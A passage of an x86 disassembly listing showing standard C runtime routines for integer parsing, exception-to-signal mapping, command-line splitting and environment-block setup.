mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40A80A: ; CODE XREF: sub_40A7C0+41�j
xor eax, eax
jmp loc_40A9E7
; ---------------------------------------------------------------------------
loc_40A811: ; CODE XREF: sub_40A7C0+23�j
cmp [ebp+arg_C], edi
jz short loc_40A822
cmp [ebp+arg_C], 2
jl short loc_40A7E5
cmp [ebp+arg_C], 24h
jg short loc_40A7E5
loc_40A822: ; CODE XREF: sub_40A7C0+54�j
mov ecx, [ebp+var_14]
push ebx
mov bl, [esi]
mov [ebp+var_4], edi
lea edi, [esi+1]
loc_40A82E: ; CODE XREF: sub_40A7C0+A5�j
cmp dword ptr [ecx+0ACh], 1
jle short loc_40A84E
lea eax, [ebp+var_14]
push eax
movzx eax, bl
push 8
push eax
call sub_40CA44
mov ecx, [ebp+var_14]
add esp, 0Ch
jmp short loc_40A85E
; ---------------------------------------------------------------------------
loc_40A84E: ; CODE XREF: sub_40A7C0+75�j
mov edx, [ecx+0C8h]
movzx eax, bl
movzx eax, byte ptr [edx+eax*2]
and eax, 8
loc_40A85E: ; CODE XREF: sub_40A7C0+8C�j
test eax, eax
jz short loc_40A867
mov bl, [edi]
inc edi
jmp short loc_40A82E
; ---------------------------------------------------------------------------
loc_40A867: ; CODE XREF: sub_40A7C0+A0�j
cmp bl, 2Dh
jnz short loc_40A872
or [ebp+arg_10], 2
jmp short loc_40A877
; ---------------------------------------------------------------------------
loc_40A872: ; CODE XREF: sub_40A7C0+AA�j
cmp bl, 2Bh
jnz short loc_40A87A
loc_40A877: ; CODE XREF: sub_40A7C0+B0�j
mov bl, [edi]
inc edi
loc_40A87A: ; CODE XREF: sub_40A7C0+B5�j
mov eax, [ebp+arg_C]
test eax, eax
jl loc_40A9CE
cmp eax, 1
jz loc_40A9CE
cmp eax, 24h
jg loc_40A9CE
test eax, eax
jnz short loc_40A8C5
cmp bl, 30h
jz short loc_40A8A9
mov [ebp+arg_C], 0Ah
jmp short loc_40A8DD
; ---------------------------------------------------------------------------
loc_40A8A9: ; CODE XREF: sub_40A7C0+DE�j
mov al, [edi]
cmp al, 78h
jz short loc_40A8BC
cmp al, 58h
jz short loc_40A8BC
mov [ebp+arg_C], 8
jmp short loc_40A8DD
; ---------------------------------------------------------------------------
loc_40A8BC: ; CODE XREF: sub_40A7C0+ED�j
; sub_40A7C0+F1�j
mov [ebp+arg_C], 10h
jmp short loc_40A8CF
; ---------------------------------------------------------------------------
loc_40A8C5: ; CODE XREF: sub_40A7C0+D9�j
cmp eax, 10h
jnz short loc_40A8DD
cmp bl, 30h
jnz short loc_40A8DD
loc_40A8CF: ; CODE XREF: sub_40A7C0+103�j
mov al, [edi]
cmp al, 78h
jz short loc_40A8D9
cmp al, 58h
jnz short loc_40A8DD
loc_40A8D9: ; CODE XREF: sub_40A7C0+113�j
inc edi
mov bl, [edi]
inc edi
loc_40A8DD: ; CODE XREF: sub_40A7C0+E7�j
; sub_40A7C0+FA�j ...
mov esi, [ecx+0C8h]
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_C]
loc_40A8EB: ; CODE XREF: sub_40A7C0+19D�j
movzx ecx, bl
movzx ecx, word ptr [esi+ecx*2]
test cl, 4
jz short loc_40A8FF
movsx ecx, bl
sub ecx, 30h
jmp short loc_40A919
; ---------------------------------------------------------------------------
loc_40A8FF: ; CODE XREF: sub_40A7C0+135�j
test cx, 103h
jz short loc_40A937
mov cl, bl
sub cl, 61h
cmp cl, 19h
movsx ecx, bl
ja short loc_40A916
sub ecx, 20h
loc_40A916: ; CODE XREF: sub_40A7C0+151�j
add ecx, 0FFFFFFC9h
loc_40A919: ; CODE XREF: sub_40A7C0+13D�j
cmp ecx, [ebp+arg_C]
jnb short loc_40A937
or [ebp+arg_10], 8
cmp [ebp+var_4], eax
jb short loc_40A94E
jnz short loc_40A92D
cmp ecx, edx
jbe short loc_40A94E
loc_40A92D: ; CODE XREF: sub_40A7C0+167�j
or [ebp+arg_10], 4
cmp [ebp+arg_8], 0
jnz short loc_40A95A
loc_40A937: ; CODE XREF: sub_40A7C0+144�j
; sub_40A7C0+15C�j
mov eax, [ebp+arg_10]
dec edi
test al, 8
jnz short loc_40A95F
cmp [ebp+arg_8], 0
jz short loc_40A948
mov edi, [ebp+arg_4]
loc_40A948: ; CODE XREF: sub_40A7C0+183�j
and [ebp+var_4], 0
jmp short loc_40A9AA
; ---------------------------------------------------------------------------
loc_40A94E: ; CODE XREF: sub_40A7C0+165�j
; sub_40A7C0+16B�j
mov ebx, [ebp+var_4]
imul ebx, [ebp+arg_C]
add ebx, ecx
mov [ebp+var_4], ebx
loc_40A95A: ; CODE XREF: sub_40A7C0+175�j
mov bl, [edi]
inc edi
jmp short loc_40A8EB
; ---------------------------------------------------------------------------
loc_40A95F: ; CODE XREF: sub_40A7C0+17D�j
test al, 4
mov esi, 7FFFFFFFh
jnz short loc_40A983
test al, 1
jnz short loc_40A9AA
and eax, 2
jz short loc_40A97A
cmp [ebp+var_4], 80000000h
ja short loc_40A983
loc_40A97A: ; CODE XREF: sub_40A7C0+1AF�j
test eax, eax
jnz short loc_40A9AA
cmp [ebp+var_4], esi
jbe short loc_40A9AA
loc_40A983: ; CODE XREF: sub_40A7C0+1A6�j
; sub_40A7C0+1B8�j
call sub_4057D3
test byte ptr [ebp+arg_10], 1
mov dword ptr [eax], 22h
jz short loc_40A99A
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_40A9AA
; ---------------------------------------------------------------------------
loc_40A99A: ; CODE XREF: sub_40A7C0+1D2�j
mov al, byte ptr [ebp+arg_10]
and al, 2
neg al
sbb eax, eax
neg eax
add eax, esi
mov [ebp+var_4], eax
loc_40A9AA: ; CODE XREF: sub_40A7C0+18C�j
; sub_40A7C0+1AA�j ...
mov eax, [ebp+arg_8]
test eax, eax
jz short loc_40A9B3
mov [eax], edi
loc_40A9B3: ; CODE XREF: sub_40A7C0+1EF�j
test byte ptr [ebp+arg_10], 2
jz short loc_40A9BC
neg [ebp+var_4]
loc_40A9BC: ; CODE XREF: sub_40A7C0+1F7�j
cmp [ebp+var_8], 0
jz short loc_40A9C9
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40A9C9: ; CODE XREF: sub_40A7C0+200�j
mov eax, [ebp+var_4]
jmp short loc_40A9E6
; ---------------------------------------------------------------------------
loc_40A9CE: ; CODE XREF: sub_40A7C0+BF�j
; sub_40A7C0+C8�j ...
mov eax, [ebp+arg_8]
test eax, eax
jz short loc_40A9D7
mov [eax], esi
loc_40A9D7: ; CODE XREF: sub_40A7C0+213�j
cmp [ebp+var_8], 0
jz short loc_40A9E4
mov eax, [ebp+var_C]
and dword ptr [eax+70h], 0FFFFFFFDh
loc_40A9E4: ; CODE XREF: sub_40A7C0+21B�j
xor eax, eax
loc_40A9E6: ; CODE XREF: sub_40A7C0+20C�j
pop ebx
loc_40A9E7: ; CODE XREF: sub_40A7C0+4C�j
pop edi
pop esi
leave
retn
sub_40A7C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A9EB proc near ; CODE XREF: sub_403EBD+8�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
xor eax, eax
cmp ds:dword_425DE0, eax
push eax
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
jnz short loc_40AA09
push offset off_423680
jmp short loc_40AA0A
; ---------------------------------------------------------------------------
loc_40AA09: ; CODE XREF: sub_40A9EB+15�j
push eax
loc_40AA0A: ; CODE XREF: sub_40A9EB+1C�j
call sub_40A7C0
add esp, 14h
pop ebp
retn
sub_40A9EB endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AA15 proc near ; CODE XREF: J8@F_7_S:004040D1�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
push esi
call sub_40531A
mov esi, eax
test esi, esi
jnz short loc_40AA34
push [ebp+arg_4]
call ds:dword_41D198 ; UnhandledExceptionFilter
jmp loc_40AB81
; ---------------------------------------------------------------------------
loc_40AA34: ; CODE XREF: sub_40AA15+F�j
mov edx, [esi+5Ch]
mov eax, ds:dword_423E44
push edi
mov edi, [ebp+arg_0]
mov ecx, edx
push ebx
loc_40AA43: ; CODE XREF: sub_40AA15+3E�j
cmp [ecx], edi
jz short loc_40AA55
mov ebx, eax
imul ebx, 0Ch
add ecx, 0Ch
add ebx, edx
cmp ecx, ebx
jb short loc_40AA43
loc_40AA55: ; CODE XREF: sub_40AA15+30�j
imul eax, 0Ch
add eax, edx
cmp ecx, eax
jnb short loc_40AA66
cmp [ecx], edi
jnz short loc_40AA66
mov eax, ecx
jmp short loc_40AA68
; ---------------------------------------------------------------------------
loc_40AA66: ; CODE XREF: sub_40AA15+47�j
; sub_40AA15+4B�j
xor eax, eax
loc_40AA68: ; CODE XREF: sub_40AA15+4F�j
test eax, eax
jz short loc_40AA76
mov ebx, [eax+8]
test ebx, ebx
mov [ebp+var_4], ebx
jnz short loc_40AA84
loc_40AA76: ; CODE XREF: sub_40AA15+55�j
push [ebp+arg_4]
call ds:dword_41D198 ; UnhandledExceptionFilter
jmp loc_40AB7F
; ---------------------------------------------------------------------------
loc_40AA84: ; CODE XREF: sub_40AA15+5F�j
cmp ebx, 5
jnz short loc_40AA95
and dword ptr [eax+8], 0
xor eax, eax
inc eax
jmp loc_40AB7F
; ---------------------------------------------------------------------------
loc_40AA95: ; CODE XREF: sub_40AA15+72�j
cmp ebx, 1
jz loc_40AB7C
mov ecx, [esi+60h]
mov [ebp+var_8], ecx
mov ecx, [ebp+arg_4]
mov [esi+60h], ecx
mov ecx, [eax+4]
cmp ecx, 8
jnz loc_40AB6E
mov ecx, ds:dword_423E38
mov edi, ds:dword_423E3C
mov edx, ecx
add edi, ecx
cmp edx, edi
jge short loc_40AAEE
imul ecx, 0Ch
loc_40AACD: ; CODE XREF: sub_40AA15+D4�j
mov edi, [esi+5Ch]
and dword ptr [ecx+edi+8], 0
mov edi, ds:dword_423E38
mov ebx, ds:dword_423E3C
inc edx
add ebx, edi
add ecx, 0Ch
cmp edx, ebx
jl short loc_40AACD
mov ebx, [ebp+var_4]
loc_40AAEE: ; CODE XREF: sub_40AA15+B3�j
mov eax, [eax]
cmp eax, 0C000008Eh
mov edi, [esi+64h]
jnz short loc_40AB03
mov dword ptr [esi+64h], 83h
jmp short loc_40AB61
; ---------------------------------------------------------------------------
loc_40AB03: ; CODE XREF: sub_40AA15+E3�j
cmp eax, 0C0000090h
jnz short loc_40AB13
mov dword ptr [esi+64h], 81h
jmp short loc_40AB61
; ---------------------------------------------------------------------------
loc_40AB13: ; CODE XREF: sub_40AA15+F3�j
cmp eax, 0C0000091h
jnz short loc_40AB23
mov dword ptr [esi+64h], 84h
jmp short loc_40AB61
; ---------------------------------------------------------------------------
loc_40AB23: ; CODE XREF: sub_40AA15+103�j
cmp eax, 0C0000093h
jnz short loc_40AB33
mov dword ptr [esi+64h], 85h
jmp short loc_40AB61
; ---------------------------------------------------------------------------
loc_40AB33: ; CODE XREF: sub_40AA15+113�j
cmp eax, 0C000008Dh
jnz short loc_40AB43
mov dword ptr [esi+64h], 82h
jmp short loc_40AB61
; ---------------------------------------------------------------------------
loc_40AB43: ; CODE XREF: sub_40AA15+123�j
cmp eax, 0C000008Fh
jnz short loc_40AB53
mov dword ptr [esi+64h], 86h
jmp short loc_40AB61
; ---------------------------------------------------------------------------
loc_40AB53: ; CODE XREF: sub_40AA15+133�j
cmp eax, 0C0000092h
jnz short loc_40AB61
mov dword ptr [esi+64h], 8Ah
loc_40AB61: ; CODE XREF: sub_40AA15+EC�j
; sub_40AA15+FC�j ...
push dword ptr [esi+64h]
push 8
call ebx
pop ecx
mov [esi+64h], edi
jmp short loc_40AB75
; ---------------------------------------------------------------------------
loc_40AB6E: ; CODE XREF: sub_40AA15+9B�j
and dword ptr [eax+8], 0
push ecx
call ebx
loc_40AB75: ; CODE XREF: sub_40AA15+157�j
mov eax, [ebp+var_8]
pop ecx
mov [esi+60h], eax
loc_40AB7C: ; CODE XREF: sub_40AA15+83�j
or eax, 0FFFFFFFFh
loc_40AB7F: ; CODE XREF: sub_40AA15+6A�j
; sub_40AA15+7B�j
pop ebx
pop edi
loc_40AB81: ; CODE XREF: sub_40AA15+1A�j
pop esi
leave
retn
sub_40AA15 endp
; =============== S U B R O U T I N E =======================================
sub_40AB84 proc near ; CODE XREF: J8@F_7_S:loc_40408E�p
push esi
push edi
xor edi, edi
cmp ds:dword_434DD4, edi
jnz short loc_40AB95
call sub_404E03
loc_40AB95: ; CODE XREF: sub_40AB84+A�j
mov esi, ds:dword_434DF8
test esi, esi
jnz short loc_40ABA4
mov esi, offset word_41D482
loc_40ABA4: ; CODE XREF: sub_40AB84+19�j
; sub_40AB84+4B�j
mov al, [esi]
cmp al, 20h
ja short loc_40ABB2
test al, al
jz short loc_40ABDC
test edi, edi
jz short loc_40ABD6
loc_40ABB2: ; CODE XREF: sub_40AB84+24�j
cmp al, 22h
jnz short loc_40ABBF
xor ecx, ecx
test edi, edi
setz cl
mov edi, ecx
loc_40ABBF: ; CODE XREF: sub_40AB84+30�j
movzx eax, al
push eax
call sub_41019D
test eax, eax
pop ecx
jz short loc_40ABCE
inc esi
loc_40ABCE: ; CODE XREF: sub_40AB84+47�j
inc esi
jmp short loc_40ABA4
; ---------------------------------------------------------------------------
loc_40ABD1: ; CODE XREF: sub_40AB84+56�j
cmp al, 20h
ja short loc_40ABDC
inc esi
loc_40ABD6: ; CODE XREF: sub_40AB84+2C�j
mov al, [esi]
test al, al
jnz short loc_40ABD1
loc_40ABDC: ; CODE XREF: sub_40AB84+28�j
; sub_40AB84+4F�j
pop edi
mov eax, esi
pop esi
retn
sub_40AB84 endp
; =============== S U B R O U T I N E =======================================
sub_40ABE1 proc near ; CODE XREF: J8@F_7_S:loc_40406B�p
push ebx
xor ebx, ebx
cmp ds:dword_434DD4, ebx
push esi
push edi
jnz short loc_40ABF3
call sub_404E03
loc_40ABF3: ; CODE XREF: sub_40ABE1+B�j
mov esi, ds:dword_425A94
xor edi, edi
cmp esi, ebx
jnz short loc_40AC17
loc_40ABFF: ; CODE XREF: sub_40ABE1+51�j
or eax, 0FFFFFFFFh
jmp loc_40ACA2
; ---------------------------------------------------------------------------
loc_40AC07: ; CODE XREF: sub_40ABE1+3A�j
cmp al, 3Dh
jz short loc_40AC0C
inc edi
loc_40AC0C: ; CODE XREF: sub_40ABE1+28�j
push esi
call sub_404130
pop ecx
lea esi, [esi+eax+1]
loc_40AC17: ; CODE XREF: sub_40ABE1+1C�j
mov al, [esi]
cmp al, bl
jnz short loc_40AC07
push 4
inc edi
push edi
call sub_40777A
mov edi, eax
cmp edi, ebx
pop ecx
pop ecx
mov ds:dword_425F98, edi
jz short loc_40ABFF
mov esi, ds:dword_425A94
push ebp
jmp short loc_40AC7D
; ---------------------------------------------------------------------------
loc_40AC3D: ; CODE XREF: sub_40ABE1+9E�j
push esi
call sub_404130
mov ebp, eax
inc ebp
cmp byte ptr [esi], 3Dh
pop ecx
jz short loc_40AC7B
push 1
push ebp
call sub_40777A
cmp eax, ebx
pop ecx
pop ecx
mov [edi], eax
jz short loc_40ACA6
push esi
push ebp
push eax
call sub_4076D5
add esp, 0Ch
test eax, eax
jz short loc_40AC78
push ebx
push ebx
push ebx
push ebx
push ebx
call sub_402E3D
add esp, 14h
loc_40AC78: ; CODE XREF: sub_40ABE1+88�j
add edi, 4
loc_40AC7B: ; CODE XREF: sub_40ABE1+69�j
add esi, ebp
loc_40AC7D: ; CODE XREF: sub_40ABE1+5A�j
cmp [esi], bl
jnz short loc_40AC3D
push ds:dword_425A94
call sub_403603
mov ds:dword_425A94, ebx
mov [edi], ebx
mov ds:dword_434DC8, 1
xor eax, eax
loc_40ACA0: ; CODE XREF: sub_40ABE1+D9�j
pop ecx
pop ebp
loc_40ACA2: ; CODE XREF: sub_40ABE1+21�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40ACA6: ; CODE XREF: sub_40ABE1+79�j
push ds:dword_425F98
call sub_403603
mov ds:dword_425F98, ebx
or eax, 0FFFFFFFFh
jmp short loc_40ACA0
sub_40ABE1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40ACBC proc near ; CODE XREF: sub_40AE54+55�p
; sub_40AE54+96�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
mov ecx, [ebp+arg_8]
push ebx
xor eax, eax
cmp [ebp+arg_0], eax
push esi
mov [edi], eax
mov esi, edx
mov edx, [ebp+arg_4]
mov dword ptr [ecx], 1
jz short loc_40ACE2
mov ebx, [ebp+arg_0]
add [ebp+arg_0], 4
mov [ebx], edx
loc_40ACE2: ; CODE XREF: sub_40ACBC+1B�j
mov [ebp+var_4], eax
loc_40ACE5: ; CODE XREF: sub_40ACBC+7E�j
; sub_40ACBC+88�j
cmp byte ptr [esi], 22h
jnz short loc_40ACFA
xor eax, eax
cmp [ebp+var_4], eax
mov bl, 22h
setz al
inc esi
mov [ebp+var_4], eax
jmp short loc_40AD36
; ---------------------------------------------------------------------------
loc_40ACFA: ; CODE XREF: sub_40ACBC+2C�j
inc dword ptr [edi]
test edx, edx
jz short loc_40AD08
mov al, [esi]
mov [edx], al
inc edx
mov [ebp+arg_4], edx
loc_40AD08: ; CODE XREF: sub_40ACBC+42�j
mov bl, [esi]
movzx eax, bl
push eax
inc esi
call sub_41019D
test eax, eax
pop ecx
jz short loc_40AD2C
inc dword ptr [edi]
cmp [ebp+arg_4], 0
jz short loc_40AD2B
mov ecx, [ebp+arg_4]
mov al, [esi]
inc [ebp+arg_4]
mov [ecx], al
loc_40AD2B: ; CODE XREF: sub_40ACBC+63�j
inc esi
loc_40AD2C: ; CODE XREF: sub_40ACBC+5B�j
test bl, bl
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_8]
jz short loc_40AD68
loc_40AD36: ; CODE XREF: sub_40ACBC+3C�j
cmp [ebp+var_4], 0
jnz short loc_40ACE5
cmp bl, 20h
jz short loc_40AD46
cmp bl, 9
jnz short loc_40ACE5
loc_40AD46: ; CODE XREF: sub_40ACBC+83�j
test edx, edx
jz short loc_40AD4E
mov byte ptr [edx-1], 0
loc_40AD4E: ; CODE XREF: sub_40ACBC+8C�j
; sub_40ACBC+AD�j
and [ebp+var_4], 0
loc_40AD52: ; CODE XREF: sub_40ACBC+183�j
cmp byte ptr [esi], 0
jz loc_40AE44
loc_40AD5B: ; CODE XREF: sub_40ACBC+AA�j
mov al, [esi]
cmp al, 20h
jz short loc_40AD65
cmp al, 9
jnz short loc_40AD6B
loc_40AD65: ; CODE XREF: sub_40ACBC+A3�j
inc esi
jmp short loc_40AD5B
; ---------------------------------------------------------------------------
loc_40AD68: ; CODE XREF: sub_40ACBC+78�j
dec esi
jmp short loc_40AD4E
; ---------------------------------------------------------------------------
loc_40AD6B: ; CODE XREF: sub_40ACBC+A7�j
cmp byte ptr [esi], 0
jz loc_40AE44
cmp [ebp+arg_0], 0
jz short loc_40AD83
mov eax, [ebp+arg_0]
add [ebp+arg_0], 4
mov [eax], edx
loc_40AD83: ; CODE XREF: sub_40ACBC+BC�j
inc dword ptr [ecx]
loc_40AD85: ; CODE XREF: sub_40ACBC+16E�j
xor ebx, ebx
inc ebx
xor ecx, ecx
jmp short loc_40AD8E
; ---------------------------------------------------------------------------
loc_40AD8C: ; CODE XREF: sub_40ACBC+D5�j
inc esi
inc ecx
loc_40AD8E: ; CODE XREF: sub_40ACBC+CE�j
cmp byte ptr [esi], 5Ch
jz short loc_40AD8C
cmp byte ptr [esi], 22h
jnz short loc_40ADBE
test cl, 1
jnz short loc_40ADBC
cmp [ebp+var_4], 0
jz short loc_40ADAF
lea eax, [esi+1]
cmp byte ptr [eax], 22h
jnz short loc_40ADAF
mov esi, eax
jmp short loc_40ADBC
; ---------------------------------------------------------------------------
loc_40ADAF: ; CODE XREF: sub_40ACBC+E5�j
; sub_40ACBC+ED�j
xor eax, eax
xor ebx, ebx
cmp [ebp+var_4], eax
setz al
mov [ebp+var_4], eax
loc_40ADBC: ; CODE XREF: sub_40ACBC+DF�j
; sub_40ACBC+F1�j
shr ecx, 1
loc_40ADBE: ; CODE XREF: sub_40ACBC+DA�j
test ecx, ecx
jz short loc_40ADD4
loc_40ADC2: ; CODE XREF: sub_40ACBC+113�j
dec ecx
test edx, edx
jz short loc_40ADCB
mov byte ptr [edx], 5Ch
inc edx
loc_40ADCB: ; CODE XREF: sub_40ACBC+109�j
inc dword ptr [edi]
test ecx, ecx
jnz short loc_40ADC2
mov [ebp+arg_4], edx
loc_40ADD4: ; CODE XREF: sub_40ACBC+104�j
mov al, [esi]
test al, al
jz short loc_40AE2F
cmp [ebp+var_4], 0
jnz short loc_40ADE8
cmp al, 20h
jz short loc_40AE2F
cmp al, 9
jz short loc_40AE2F
loc_40ADE8: ; CODE XREF: sub_40ACBC+122�j
test ebx, ebx
jz short loc_40AE29
test edx, edx
movsx eax, al
push eax
jz short loc_40AE17
call sub_41019D
test eax, eax
pop ecx
jz short loc_40AE0B
mov al, [esi]
mov ecx, [ebp+arg_4]
inc [ebp+arg_4]
mov [ecx], al
inc esi
inc dword ptr [edi]
loc_40AE0B: ; CODE XREF: sub_40ACBC+140�j
mov ecx, [ebp+arg_4]
mov al, [esi]
inc [ebp+arg_4]
mov [ecx], al
jmp short loc_40AE24
; ---------------------------------------------------------------------------
loc_40AE17: ; CODE XREF: sub_40ACBC+136�j
call sub_41019D
test eax, eax
pop ecx
jz short loc_40AE24
inc esi
inc dword ptr [edi]
loc_40AE24: ; CODE XREF: sub_40ACBC+159�j
; sub_40ACBC+163�j
inc dword ptr [edi]
mov edx, [ebp+arg_4]
loc_40AE29: ; CODE XREF: sub_40ACBC+12E�j
inc esi
jmp loc_40AD85
; ---------------------------------------------------------------------------
loc_40AE2F: ; CODE XREF: sub_40ACBC+11C�j
; sub_40ACBC+126�j ...
test edx, edx
jz short loc_40AE3A
mov byte ptr [edx], 0
inc edx
mov [ebp+arg_4], edx
loc_40AE3A: ; CODE XREF: sub_40ACBC+175�j
inc dword ptr [edi]
mov ecx, [ebp+arg_8]
jmp loc_40AD52
; ---------------------------------------------------------------------------
loc_40AE44: ; CODE XREF: sub_40ACBC+99�j
; sub_40ACBC+B2�j
mov eax, [ebp+arg_0]
test eax, eax
pop esi
pop ebx
jz short loc_40AE50
and dword ptr [eax], 0
loc_40AE50: ; CODE XREF: sub_40ACBC+18F�j
inc dword ptr [ecx]
leave
retn
sub_40ACBC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40AE54 proc near ; CODE XREF: J8@F_7_S:0040405A�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
xor ebx, ebx
cmp ds:dword_434DD4, ebx
push esi
push edi
jnz short loc_40AE6C
call sub_404E03
loc_40AE6C: ; CODE XREF: sub_40AE54+11�j
push 104h
mov esi, offset dword_4262F8
push esi
push ebx
mov ds:byte_4263FC, bl
call ds:dword_41D060
mov eax, ds:dword_434DF8
cmp eax, ebx
mov ds:dword_425FA8, esi
jz short loc_40AE9A
cmp [eax], bl
mov [ebp+var_4], eax
jnz short loc_40AE9D
loc_40AE9A: ; CODE XREF: sub_40AE54+3D�j
mov [ebp+var_4], esi
loc_40AE9D: ; CODE XREF: sub_40AE54+44�j
mov edx, [ebp+var_4]
lea eax, [ebp+var_8]
push eax
push ebx
push ebx
lea edi, [ebp+var_C]
call sub_40ACBC
mov eax, [ebp+var_8]
add esp, 0Ch
cmp eax, 3FFFFFFFh
jnb short loc_40AF05
mov ecx, [ebp+var_C]
cmp ecx, 0FFFFFFFFh
jnb short loc_40AF05
mov edi, eax
shl edi, 2
lea eax, [edi+ecx]
cmp eax, ecx
jb short loc_40AF05
push eax
call sub_40773A
mov esi, eax
cmp esi, ebx
pop ecx
jz short loc_40AF05
mov edx, [ebp+var_4]
lea eax, [ebp+var_8]
push eax
add edi, esi
push edi
push esi
lea edi, [ebp+var_C]
call sub_40ACBC
mov eax, [ebp+var_8]
add esp, 0Ch
dec eax
mov ds:dword_425F8C, eax
mov ds:dword_425F90, esi
xor eax, eax
jmp short loc_40AF08
; ---------------------------------------------------------------------------
loc_40AF05: ; CODE XREF: sub_40AE54+65�j
; sub_40AE54+6D�j ...
or eax, 0FFFFFFFFh
loc_40AF08: ; CODE XREF: sub_40AE54+AF�j
pop edi
pop esi
pop ebx
leave
retn
sub_40AE54 endp
; =============== S U B R O U T I N E =======================================
sub_40AF0D proc near ; CODE XREF: J8@F_7_S:00404050�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
mov eax, ds:dword_426400
push ebx
push ebp
push esi
push edi
mov edi, ds:dword_41D134
xor ebx, ebx
xor esi, esi
cmp eax, ebx
push 2
pop ebp
jnz short loc_40AF56
call edi
mov esi, eax
cmp esi, ebx
jz short loc_40AF3D
mov ds:dword_426400, 1
jmp short loc_40AF5F
; ---------------------------------------------------------------------------
loc_40AF3D: ; CODE XREF: sub_40AF0D+22�j
call ds:dword_41D0F0
cmp eax, 78h
jnz short loc_40AF51
mov eax, ebp
mov ds:dword_426400, eax
jmp short loc_40AF56
; ---------------------------------------------------------------------------
loc_40AF51: ; CODE XREF: sub_40AF0D+39�j
mov eax, ds:dword_426400
loc_40AF56: ; CODE XREF: sub_40AF0D+1A�j
; sub_40AF0D+42�j
cmp eax, 1
jnz loc_40AFE3
loc_40AF5F: ; CODE XREF: sub_40AF0D+2E�j
cmp esi, ebx
jnz short loc_40AF72
call edi
mov esi, eax
cmp esi, ebx
jnz short loc_40AF72
loc_40AF6B: ; CODE XREF: sub_40AF0D+DC�j
; sub_40AF0D+E8�j ...
xor eax, eax
jmp loc_40B03B
; ---------------------------------------------------------------------------
loc_40AF72: ; CODE XREF: sub_40AF0D+54�j
; sub_40AF0D+5C�j
cmp [esi], bx
mov eax, esi
jz short loc_40AF87
loc_40AF79: ; CODE XREF: sub_40AF0D+71�j
; sub_40AF0D+78�j
add eax, ebp
cmp [eax], bx
jnz short loc_40AF79
add eax, ebp
cmp [eax], bx
jnz short loc_40AF79
loc_40AF87: ; CODE XREF: sub_40AF0D+6A�j
mov edi, ds:dword_41D138
push ebx
push ebx
push ebx
sub eax, esi
push ebx
sar eax, 1
inc eax
push eax
push esi
push ebx
push ebx
mov [esp+38h+var_4], eax
call edi
mov ebp, eax
cmp ebp, ebx
jz short loc_40AFD8
push ebp
call sub_40773A
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_40AFD8
push ebx
push ebx
push ebp
push eax
push [esp+28h+var_4]
push esi
push ebx
push ebx
call edi
test eax, eax
jnz short loc_40AFD4
push [esp+18h+var_8]
call sub_403603
pop ecx
mov [esp+18h+var_8], ebx
loc_40AFD4: ; CODE XREF: sub_40AF0D+B7�j
mov ebx, [esp+18h+var_8]
loc_40AFD8: ; CODE XREF: sub_40AF0D+97�j
; sub_40AF0D+A6�j
push esi
call ds:dword_41D13C
mov eax, ebx
jmp short loc_40B03B
; ---------------------------------------------------------------------------
loc_40AFE3: ; CODE XREF: sub_40AF0D+4C�j
cmp eax, ebp
jz short loc_40AFEB
cmp eax, ebx
jnz short loc_40AF6B
loc_40AFEB: ; CODE XREF: sub_40AF0D+D8�j
call ds:dword_41D140
mov esi, eax
cmp esi, ebx
jz loc_40AF6B
cmp [esi], bl
jz short loc_40B009
loc_40AFFF: ; CODE XREF: sub_40AF0D+F5�j
; sub_40AF0D+FA�j
inc eax
cmp [eax], bl
jnz short loc_40AFFF
inc eax
cmp [eax], bl
jnz short loc_40AFFF
loc_40B009: ; CODE XREF: sub_40AF0D+F0�j
sub eax, esi
inc eax
mov ebp, eax
push ebp
call sub_40773A
mov edi, eax
cmp edi, ebx
pop ecx
jnz short loc_40B027
push esi
call ds:dword_41D144
jmp loc_40AF6B
; ---------------------------------------------------------------------------
loc_40B027: ; CODE XREF: sub_40AF0D+10C�j
push ebp
push esi
push edi
call sub_407BF0
add esp, 0Ch
push esi
call ds:dword_41D144
mov eax, edi
loc_40B03B: ; CODE XREF: sub_40AF0D+60�j
; sub_40AF0D+D4�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_40AF0D endp
; =============== S U B R O U T I N E =======================================
sub_40B042 proc near ; CODE XREF: J8@F_7_S:loc_40402C�p
push esi
push edi
mov eax, offset dword_421294
mov edi, offset dword_421294
cmp eax, edi
mov esi, eax
jnb short loc_40B063
loc_40B054: ; CODE XREF: sub_40B042+1F�j
mov eax, [esi]
test eax, eax
jz short loc_40B05C
call eax
loc_40B05C: ; CODE XREF: sub_40B042+16�j
add esi, 4
cmp esi, edi
jb short loc_40B054
loc_40B063: ; CODE XREF: sub_40B042+10�j
pop edi
pop esi
retn
sub_40B042 endp
; =============== S U B R O U T I N E =======================================
sub_40B066 proc near ; DATA XREF: sub_407979+3F�o
push esi
push edi
mov eax, offset dword_42129C
mov edi, offset dword_42129C
cmp eax, edi
mov esi, eax
jnb short loc_40B087
loc_40B078: ; CODE XREF: sub_40B066+1F�j
mov eax, [esi]
test eax, eax
jz short loc_40B080
call eax
loc_40B080: ; CODE XREF: sub_40B066+16�j
add esi, 4
cmp esi, edi
